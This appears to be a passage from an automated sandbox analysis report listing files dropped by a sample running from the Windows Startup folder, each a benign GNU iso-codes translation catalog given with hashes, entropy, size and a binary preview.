                                                                                                    SSDEEP:192:deoDXOltU4WjV9qWxa5hW81ZD2mENTPINfz:0oDXOg4WjVDxa5hW81ZLEpa7
                                                                                                    MD5:BFA4889AF0A8E3BDA68E0B25F6D67A29
                                                                                                    SHA1:CBF4D065325C2C34531C36257AB9D194FF561DFF
                                                                                                    SHA-256:328AB066A595B71CC726D668864F160742511A1A65139BC46ADB3270584D88C8
                                                                                                    SHA-512:4DF4C2F1BDF5A32358E695F73B2BC9F42B0681568EBDDCBD616303E73DABFFE8C95C38D37E65400CD9E2D436DA551EBF53D13DB0DFD96E73A5AF3CE5BDD0AECE
                                                                                                    Malicious:false
                                                                                                    Preview:................................x.......y...................?...........................................................................%.......-.......7.......C.......P.......Y.......`.......h.......q.......w.......~.......................................................................................:.......B...&...K.......r...........(...........................................................'.......2.......9.......A.......G.......P.......Y.......s...........,...........................................................(.......9.......O...&...f...........4...........................................................#...............B.......V.......\.......c...#...u...............................................................................!.......'.......0.......9.......G.......L.......S.......Z.......c.......m.......................................................................................*...(...4.......].......f.......n...........-...............!...........................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\320\220\321\204\320\263\320\260\320\275\321\226\321\201\321\202\320\260\320\275'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29887
                                                                                                    Entropy (8bit):5.31317671818373
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0o0648fmsWP48WAIYKU2WwZudLi5Z2TU1TZGErGe3Is9:b0648y22L1U1N55Ik
                                                                                                    MD5:3391C50061FAB612994A9F57750CE213
                                                                                                    SHA1:3DDDD647B1C7AA025CE39BCAD44333AED11EA467
                                                                                                    SHA-256:CD2BFE4F56C0CB4074FEAE6A9CCC22B6B3F80A7B530909D159C30ACD50E9F7F9
                                                                                                    SHA-512:F0E8D3B4EB116C3C6248C7597462A2492B6441937AABB1012F140FE16E8ADE5111FB546DD0FD048AA9BFC5218237BF41176D4BDEAF5B916E7A7D0226CD2087C2
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 4820 messages, Project-Id-Version: iso_3166-2 '\320\220\321\201\321\226\321\200'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):255945
                                                                                                    Entropy (8bit):5.503167211439664
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:C5lv7Ti+Jjo6IQhT9UN9PkeWUKtmsw8qdkUd+ilkrzIzwuVRLmazDZexClnV8D1r:8+YiNCd9RPULZr5OFWlgUFC
                                                                                                    MD5:36E5A83CAC8C524E645371AE3FF66081
                                                                                                    SHA1:53E80002DF6F0823D39D0D253A7E285FD973F4E0
                                                                                                    SHA-256:C7704825C54B17F990C2815909D32A2C51B23CA381225213E262ECFB6F1555C3
                                                                                                    SHA-512:6ABCC63A1FCC8869417F3F6C32584EDCD52A884C3A35F6C70E0068FC274B005C51FF6A648CC406D7BE3BE891E01B8BFAB2D015C55B0B59F122DA024DF045D2CE
                                                                                                    Malicious:false
                                                                                                    Preview:........................\-.................................................................................%.......*.......2.......7.......@.......E.......M.......m.......s.......|...................................................................................................................................).......6.......;.......J.......Q.......f.......l.......|......................................................................................................................................+...........K.......P.......c.......j.......w.......}...................................................................................................&.......1.......F.......R.......^.......j.......x...........................................................................................&.......3.......=.......I.......X.......`.......j.......t.......}...........................................................................................%.......3.......C.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\320\221\321\200\320\270\321\202\320\260\320\275\321\201\321\214\320\272\321\226 \320\220\320\275\321\202\320\260\321\200\320\272\321\202\320\270\321\207\320\275\321\226 \320\242\320\265\321\200\320\270\321\202\320\276\321\200\321\226\321\227'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3668
                                                                                                    Entropy (8bit):5.573896521207671
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3OMcFQ+vGqIfdvqN5CoUOsjczr6Elrejc:rLvOxFQ+yaCoZsjciY
                                                                                                    MD5:5E604368F3A70D97E3E56C1E2D312A9C
                                                                                                    SHA1:9A5239A77C818A42F1BCE1300CA4E7BB6A8D3027
                                                                                                    SHA-256:341D90A8E0F57255A74F6C93D1E3F103C573C5D81929D0F3C5B474AABC0EB78A
                                                                                                    SHA-512:AD90B942E45616ADEB6129032ADCFD865CD0DA8AC3D12E7D5BDB3239483E745A3CA4643766D01FE1B920DE2016FFA2BC5050331CBD9FF003FB52BB399CBEDF59
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+.......................>.......O...F...W.......1.......d... ..........."...............).......-.......T...)...>...~...3.......................>...+...'...j...........O.......,.......$...'.......L.......Y...K...y...M...............=...B...........E.......Y...........6........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 '\320\236\320\264\320\270\320\275\320\270\321\206\321\217 \320\276\320\261\320\273\321\226\320\272\321\203 \320\220\320\221\320\240'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12535
                                                                                                    Entropy (8bit):5.3054661881541625
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:SwpJsak76TL0G/Uo/WEH+zqRsmSi9mwTj+rNN:SImaI8YAUoOg+tmSi0wTjeN
                                                                                                    MD5:B4316A074B0286B8155A6AE950F04ECB
                                                                                                    SHA1:C919A931B9AD7E5956FFD5326DF9D468B09885CE
                                                                                                    SHA-256:2A3D96C3B8F0BEEAEF342E9DBCE56F9C2508B5294162B57F65D5E9933C6D30DD
                                                                                                    SHA-512:87711DB288028AF59DCD0AD8176538BDC47B773DA2E36C65816295CA8DE1BE876F3E3E7551DCE626ADC1DCADABAC3EFFD771C08359262AFBB1FF505CA54F2B28
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 9327 messages, Project-Id-Version: iso_639-3 '\320\260\321\200\320\265\320\260\321\200\320\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):511201
                                                                                                    Entropy (8bit):5.445562713348814
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:h/5ebkRBJR5Z1Sqkd9pwN7FhvOh/IvgKXd3qwYHvio4PpiFEvZ3QJGpHi+hhBb/e:nG90Xv8AZBWHvibBKE3CDIU/17wTHobr
                                                                                                    MD5:3F600A8F684C194E0E44ED4CF6B3F404
                                                                                                    SHA1:5B8946409EE6B6CA2FB83280175C4D28A35DE526
                                                                                                    SHA-256:C24AA12F81E6B5135C725E5DF8E746A116C48D9B1641F820E95C946614963D7E
                                                                                                    SHA-512:EB62D51782C9237028198C8EDBBFF3D1A3EA1474EA94D748ACA17EFE7BA0BA9959C9DB197D140C00615C36697B52DDE44F60F0EBAA6BD42185FAA9D71E68D4AB
                                                                                                    Malicious:false
                                                                                                    Preview:........o$.......#...0...G......`.......a.......j.......t.......y............................................................................................................................................................... .......&.......*.......7.......<.......A.......F.......L.......T.......Y.......j.......r.......y.......~.......................................................................................................................................$.......+.......1.......8.......<.......K.......U.......e.......s.......................................................................................................................................................$.......*.......8.......>.......C.......S.......Y.......`.......d.......i.......n.......................................................................................2.......=.......D.......M.......S.......a.......k.......u.......|.......................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 116 messages, Project-Id-Version: iso_639-5 '\320\260\321\204\321\200\320\276-\320\260\320\267\321\226\320\271\321\201\321\214\320\272\321\226 \320\274\320\276\320\262\320\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9363
                                                                                                    Entropy (8bit):5.2324686929464725
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:4SDxF/iJXuuaSE0BfNcakLFKWYTUn6gv+UwH7NWdj:X74ZE0BfNcak5KWYo6gv+Uu7NWdj
                                                                                                    MD5:1DB7CB96CAE6B5983B9F074456BD372A
                                                                                                    SHA1:5203D4B051688CC8531D91F83D24124B990D5F24
                                                                                                    SHA-256:D76167CCF84E427D68019F2C056EE5E4F3A8E9060E940FC5CE975E4A537BA0FF
                                                                                                    SHA-512:1D5CA8933FC9729C541A6FD845CDDB2ECCAB2D9A8AD18FE7C8DED59D36B59B8E935FB8C0604F02963F4D9AFC3BA25B0BBA67892AD121A38AD0290570FA3E74F6
                                                                                                    Malicious:false
                                                                                                    Preview:........t...............\............................................... .......5.......F.......W.......h.......{...............................................................&.......9.......I.......Y.......i.......y...................................!.......#...................2.......C.......T.......g.......x...$.......#.......%...........................".......:...#...P.......t.......................................................................*.......8.......H.......`.......w...............................................................................7.......G.......X.......h.......|...............................................................1.......J.......[.......l...............................................................................'.......9.......P.......a.......r...............................................................(.......9.......H.......Y.......j...........................#......................................."...+...%...N.......t...........!...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 222 messages, Project-Id-Version: iso_3166-1 '\330\247\331\201\330\272\330\247\331\206\330\263\330\252\330\247\331\206'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11711
                                                                                                    Entropy (8bit):5.136480548982286
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:eRT2GolZt2StI8ml5bxpTJB6/ugoxu0Zb71p6l+yTm7wBcCjTAOUIHMKFsB5nP:eJwlZt2Um7bxp10/ugoxu0Zv1pm+yTmx
                                                                                                    MD5:EC4333CA6BC0D0156B02B2753B36BB46
                                                                                                    SHA1:1249300241E90778EBB1F578097AF49E1130A56E
                                                                                                    SHA-256:B5C0BA0E49A1E1AF6F52132956853635B92CE6888EFB2814F30727584D936E6F
                                                                                                    SHA-512:7350B7620166DC2AC1115BB394A1960299445BA3F03ACBFA5BB069B76239FB2A23FAB661660B6A3966CC47706013FD160B8A2516DDF714632CCA58DCD1473986
                                                                                                    Malicious:false
                                                                                                    Preview:....................3................................................................................... .......*.......2.......8.......B.......J.......U.......].......h.......q.......y...............................................................................................................&...............7.......@.......G.......V.......o.......t.......z..............................................................................................................................."...............@.......H.......Q......._.......~.......................................................................................................................................................(......./...!...5.......W.......`.......j.......r.......z.......................................................................................................................................................'......./.......7.......=.......K.......U.......`.......k.......r.......{...............................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 198 messages, Project-Id-Version: iso_3166-1 'Afg\312\273oniston'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8863
                                                                                                    Entropy (8bit):4.745674817543107
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:+OPx7JUgwiLZyvzRJfT+MagLLkuNb8GPzn/xqFR7Q:fPBxLZy7RJfargLLkuNPTgFRk
                                                                                                    MD5:D8CC41CC9CA64420959ACAF28FAFE118
                                                                                                    SHA1:B3C2C8F20C86DF797170EAC1E44920E00611DABD
                                                                                                    SHA-256:49028F69DC2D3E4AEE7FE29744B912CE8FE3E15D43846C2AD892F03DF95541FA
                                                                                                    SHA-512:1EAC6DC5BEF6B181675F0D118574657FB39F1E36999A47C94C08F020F421A38ED127F8900A936FEF4DA0E44AB3B72C4CE90C893AB58A19E252A9DDCC58B218A7
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|....................................................................................................... .......*.......2.......=.......E.......P.......Y.......a.......i.......p.......v.......~...............................................................................................................................'......./.......<.......G.......O.......T.......[.......j.......r.......{...............................................................................................................#.......).......1.......9.......?.......I.......P.......Z.......b.......m.......r.......|.......................................................................................................................................................................!.......,.......3.......;.......C.......K.......Q......._.......i.......t...............................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 185 messages, Project-Id-Version: iso_3166-1 'Afghanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7913
                                                                                                    Entropy (8bit):4.674201973207991
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:tSLivXwR5bRQFcVIa6bs1THFUTaf0sKk5T0FUya8+ZC5x:+mO5muVYbQzFUWf9Kk5AFUZ835x
                                                                                                    MD5:E66DA1FAEA5593D5A9BEF3BE5ABE2DBF
                                                                                                    SHA1:1F026EB29DEC96A9B4D1322E359D25AD38A86254
                                                                                                    SHA-256:50F9E0F48B7057CF9D140E0473A4E05774155D41507EC1CC82B980F42F19DAD6
                                                                                                    SHA-512:C885F4BDEC517866CE4E4B7603F5BDD9C56721CF8000703ABF2D0CFE7DFECAC9AB3D149B8D7FA2DE6A21F9306F56C042106CE9D7B294287F6B26D709ED7CC9EF
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................................................................................................%.......0.......8.......@.......K.......T.......\.......d.......k.......q.......y.......................................................................................................................................(.......0.......6.......A.......I.......N.......U.......d.......l.......u.......~.......................................................................................................................................&.......,.......3.......=.......E.......J.......T.......[.......i.......p.......v...............................................................................................................................................................................#.......1.......;.......F.......Q.......X.......a.......j.......o.......u.......................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 13 messages, Project-Id-Version: iso_3166-2 'American Samoa'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):924
                                                                                                    Entropy (8bit):5.010450394587115
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:sq9OgwXF9lVAST1gknhNkyzYSt0UFXapHsXmFhNkyzW:s/TlVAMCmhNpU/UIpHtFhNpa
                                                                                                    MD5:D9B9982186788DF1FF6B6CD60C1B8189
                                                                                                    SHA1:E2069A6A57115B1B13A17479EAF85FD91B3F6E8B
                                                                                                    SHA-256:1CEB8CEA9B7C72F5F6BE3E3D83BF869F4D4421C822B347DF31DF365A66EB96F6
                                                                                                    SHA-512:EFF42611C3FA1FD8A587AEF90DEF336AE0AE5BF60F7F7C10C69143704630736AFCFC68F3A6C5AAE9E34A58CCD959BC1F8B2D09C4E8BC5E8E1B776078D9E866E4
                                                                                                    Malicious:false
                                                                                                    Preview:................................0.......1.......@.......F.......M.......V.......^.......c.......m.......r.......x...............................*.......9.......?.......F.......O.......W.......\.......f.......k.......q........................................................................................American Samoa.Aruba.Belize.Djibouti.Georgia.Guam.Guatemala.Mali.Niger.Northern Mariana Islands.Puerto Rico.Zaire.Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2002-11-13 22:07SAST.Last-Translator: Fhatuwani Rambau <fhatuwani@translate.org.za>.Language-Team: Venda <venda@translate.org.za>.Language: ve.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 1.0beta2..American Samoa.Aruba.Belize.Djibouti.Georgia.Guam.Guatemala.Mali.Niger.Northern Mariana Islands.Puerto Rico.Zaire.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 'Netherlands Antilles'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):514
                                                                                                    Entropy (8bit):5.208623537436132
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iU/c1xjt02UkFf/hUdrvedD8HsXmBQWiR8ZAp:M5t0UFXapHsXmg
                                                                                                    MD5:5A6AFFA84AFD5E5696029C79ACFA9CD1
                                                                                                    SHA1:6639C6D5F02B9AF535D24F70AEE2C54DC6048175
                                                                                                    SHA-256:DCD8134B93B9C72855E1E1A041041F807D49641D5E28D0D2F63A5CD168C8C853
                                                                                                    SHA-512:339A18F0769290A86DEA8D2E5DCEEF48A37E27C5CCD1BCC92E21DF9A76D278B6B874B75A0E9D1AB88C038279FB45DEAA701DD49834393C1F4AF02BF75AB1FF50
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q.......f................................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2002-11-13 22:07SAST.Last-Translator: Fhatuwani Rambau <fhatuwani@translate.org.za>.Language-Team: Venda <venda@translate.org.za>.Language: ve.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 1.0beta2..Netherlands Antilles.
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 41 messages, Project-Id-Version: iso_639-3 'Abkhazian'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1997
                                                                                                    Entropy (8bit):4.667940178067642
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Ao9nySYWYvWazelqn1l0XrY+M9C0WyaVt0UzapHsXmU4BmNN9C0WzR1K:Ao9ySqCxU+V9/MUOpHtf+e9q
                                                                                                    MD5:137085522EC46ECA83861538AD580924
                                                                                                    SHA1:B9CF74662A397DB5D58F8C63578955F05E6B9A79
                                                                                                    SHA-256:B736C491E1B231C0A20032F619AA1A68CEBA36639C12BFFF9A1D0FE6C5EBBEF6
                                                                                                    SHA-512:C886E7F05B9282CF3E9942A198D11F5EFB9B362C0250DEEFBAA4E16C8B7E4757A99DA567893782E4456E7C31D1DD7F68923BF02936CB6B55CA35F85BC7B8725F
                                                                                                    Malicious:false
                                                                                                    Preview:........).......d...;...........................................................................................................................................................(.......0.......9.......A.......I.......R.......X......._.......h.......p.......z...............................................................................................................l.......v.......{.......................................................................................................................................................#.......,.......2.......9.......B.......L.......V......._.......f.......q.......y....................................................................... .......................................)...........&..............................................................."...'...(...........%...................$.......................................!...........#........................Abkhazian.Afar.Afrikaans.Amharic.Arabic.Assamese.Avestan.Aymara.Azerbaijani.Bas
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 130 messages, Project-Id-Version: iso_15924 'A R\341\272\255p'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7457
                                                                                                    Entropy (8bit):5.268582663054147
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:/3T8eaK3JaXqX64K3Sa54lcvQdbwsExQak:/weaBXB4Ra54lFdUsEqak
                                                                                                    MD5:9F6622573B3439AB0146C507836454BC
                                                                                                    SHA1:CF7DF4EE7C770DD3F339E5EF8C5CA7010B44AA0A
                                                                                                    SHA-256:D7D1AFF1032F95C70F90ECB491E792CF3E1479D337D0DEEB303172FF12FF9469
                                                                                                    SHA-512:5750BDCED820611121DC85C15D798DC1ABCB5104E7CFA7DAC7DB67872469A1E8D98F69B85C408E725291005D0FA88A7F496BAFAC3DA5F329899F8CEC623A2B8C
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<............................................................... .......,.......9.......B.......I.......Q.......Z.......`.......g.......n.......s.......|...................................................................&...!.......H.......Y.......m.......~.......................................................................................).......C.......].......p.......w.......................................................................................(.......3...#...9.......].......}............................................................................................................... .......6.......H.......g.......v...(...............-...............................#......."...&.......I.......T.......`.......f.......n.......{................................... ...................................................&.......5.......A.......I.......S.......`.......h.......o...............................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 409 messages, Project-Id-Version: iso_3166-1 'A Ph\303\272 H\303\243n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24644
                                                                                                    Entropy (8bit):5.3840423342899095
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:VDC08X6lN0N0cTqq+6msOP4XLAEj14kxdPHHGF:FCtoVjcjrGF
                                                                                                    MD5:41543D9E52ECCEF2A1E241568A24E5B5
                                                                                                    SHA1:950251CD153EC0254E59D84D80ACFA99A12E93C4
                                                                                                    SHA-256:CA654462700FFD33C1870CD65DD849A58961E87066B1D6E480C125119F42749B
                                                                                                    SHA-512:45384B9A122AFD7F04387444D876D62109AA6412E9989E8EC9070558C37FE30447138429E2664605468D1BAA81E8F9D8BAC5C30C1EBD8D0509AA3769730F155A
                                                                                                    Malicious:false
                                                                                                    Preview:....................#...........8"......9"......E"......M"......U"......d"......l"......s"......|".......".......".......".......".......".......".......".......".......".......".......#.......#.......#.......#......&#.......#......5#......;#......C#.. ...J#......k#......s#.. ....#.......#.......#.......#.......#.......#.......$.......$......1$......:$......G$......O$......X$......a$......h$......w$.......$.......$.......$.......$.......$.......$.......$.......$..,....%......5%......=%..%...C%......i%......v%.......%.......%.......%.......%.......%.......%..%....%..,....%.."....&..*...2&......]&......e&......n&......w&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'..'....'..$...='......b'......~'.......'.......'.......'.......'.......'.......(.......(.......(......&(......6(......R(......X(......j(......q(......y(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......(.......).......)..!...%)......G)......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 3223 messages, Project-Id-Version: iso_3166-2 ''Eua'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):135199
                                                                                                    Entropy (8bit):5.24413445867628
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:j8/hBrzNwai5WjPUHLNJQKEx7gGcKDdsENkQvwaC2OcuHu9y7:Lai5HwcGc6TCRcuO9g
                                                                                                    MD5:3300F8670EB30525C8F6BFB85EC376F6
                                                                                                    SHA1:5C72A857E071750528F768AB52CAD6C6D2FB6D35
                                                                                                    SHA-256:E87438FE425E9195943BE14E2B27E14B2671EE18A6C75E57A9015716F283C060
                                                                                                    SHA-512:413DA20C5C0E7F80A8B0F86438A614B287E02E5A907631F18F5384697F2A2B892E1C7A24ED94612B84980CC132069841FB6B5CED73B94EDEF1440F11BA2EA8A2
                                                                                                    Malicious:false
                                                                                                    Preview:.................d..............................................................................................................................................$.......3.......<.......D.......J.......S.......Y.......c.......j.......z.......................................................................................................................................................#.......).......1.......;.......P.......\.......l.......w.......................................................................................................................&.......0.......=.......G.......V.......d.......t...............................................................................................................................................#.......*.......1.......:.......J.......b.......o.......}.......................................................................................................................................).......8.......@.......Q.......].......d.......n.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Mi\341\273\201n Nam C\341\273\261c Qu\341\273\221c Anh'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2686
                                                                                                    Entropy (8bit):5.547650646918676
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADFl/UM8vGqIfdvqNuoUhtzO6xC2xfIbNR4DFJl:qD/d8yBoUO6NwB8
                                                                                                    MD5:242C272C85D381E29DAFB7C087190FB1
                                                                                                    SHA1:5B9177CF6CEC973799550A2C4A3B9017C534D736
                                                                                                    SHA-256:F0A5AC619026A800E023087657D086BF8A2D97477E3BED5F6E7DE462E9A5EED7
                                                                                                    SHA-512:FA6A8F1CD971AD3B75E5ACD1B3600A98429B43E13B2CC3C7F877C60D7FD045C39955456D244A6C86BEC7845C1E56BFA09EDF8BA0F6E379BD0FE5CCFE97CA7E9D
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c.......................6.../...R...3...................................................................C..."...b...................................................5...........?.......X.......x...........2.......0...............!...........2...*...@.......k........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 142 messages, Project-Id-Version: iso_4217 '\304\220\341\273\223ng Ap-ga-ni'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):8278
                                                                                                    Entropy (8bit):5.169407034227225
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:HniqyehnDFqLqPCVOkKj9A1KahhwfxFqrbAy/i:Hn4WZqLqPGlKju1KaPwvqrbAci
                                                                                                    MD5:E3A320821C860A6554A5E41ADA65A4C6
                                                                                                    SHA1:BE58C5E6CE4BE31231191C3F3B78C0479F079E7C
                                                                                                    SHA-256:A35D0A6F7504F0645352BB68BC50863F7647965A065075A93C2ED86074E4F3A1
                                                                                                    SHA-512:E8C67D9DBD4967C6444BCBD8D4499B6ADE947C8E71CA5C3ECBF72D785D6DAA9E2119B196A0CADBC41471883D793C323CFBB7471B2589344585690725A82FD6A6
                                                                                                    Malicious:false
                                                                                                    Preview:........................................................................-.......?.......O.......^.......c.......j.......z...............................................................................................+.......8.......G.......W.......c.......u.......................................................................................................................2.......>.......E.......P.......`.......e.......l.......t.......................................................................................................................#.......2.......6.......>.......D.......T.......a.......k.......p...............................................................................................................7.......H.......X.......`.......o.......y...............................................................................................................................!.......-.......;.......L.......S.......d.......{.......................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 340 messages, Project-Id-Version: iso_639-3 'Ti\341\272\277ng Ap-kha-di-a'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):16925
                                                                                                    Entropy (8bit):5.067545863849342
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:3sz6Nfu3aIZCcjLWfFMrsQ86B07d1ncxyNNF:3DJua73fdlHF
                                                                                                    MD5:6FD4F1398362E00D600372A0F812B376
                                                                                                    SHA1:ECDF35689A7DBD98CBF86CDB5960FD2FBD1ADCE4
                                                                                                    SHA-256:41E6948DEF7DA1C13B592B0F59057AC441B0456E13AF42E7A2029E9BAF5BE978
                                                                                                    SHA-512:1CF7D5A73561B9EBE35ECA6DE131A77D6AB7F11F8439F56463F8878EC708330A9F6DF2403C92F661C6EC8D7F0BCDBF92DBF3406B903F1B9522291DE5712FC4D9
                                                                                                    Malicious:false
                                                                                                    Preview:........T...............\.......................................................................................................................................................................................'...............5.......A.......J.......R.......Z.......b.......i.......n.......y...............................................................................................................................................................................%.......4.......>.......F.......O.......W.......h.......o.......w.......................................................................................................................................................................+.......1.......;.......D.......H.......O.......U.......].......d.......l.......p.......w........................................................................................................................ ....... ....... ....... ....... ......& ......- ......4 ......? ......E ......O ......W ......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 404 messages, Project-Id-Version: iso_3166-1 'Afganistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):22427
                                                                                                    Entropy (8bit):5.0371302673102045
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:EADkYG2g6yD378Q0gxr8jq5wsOP4XJOAE1i3N0J7vi8q+n9w8DjrZ:3n0t0gW+msOP4XJOAEz1Pzn9w8Dx
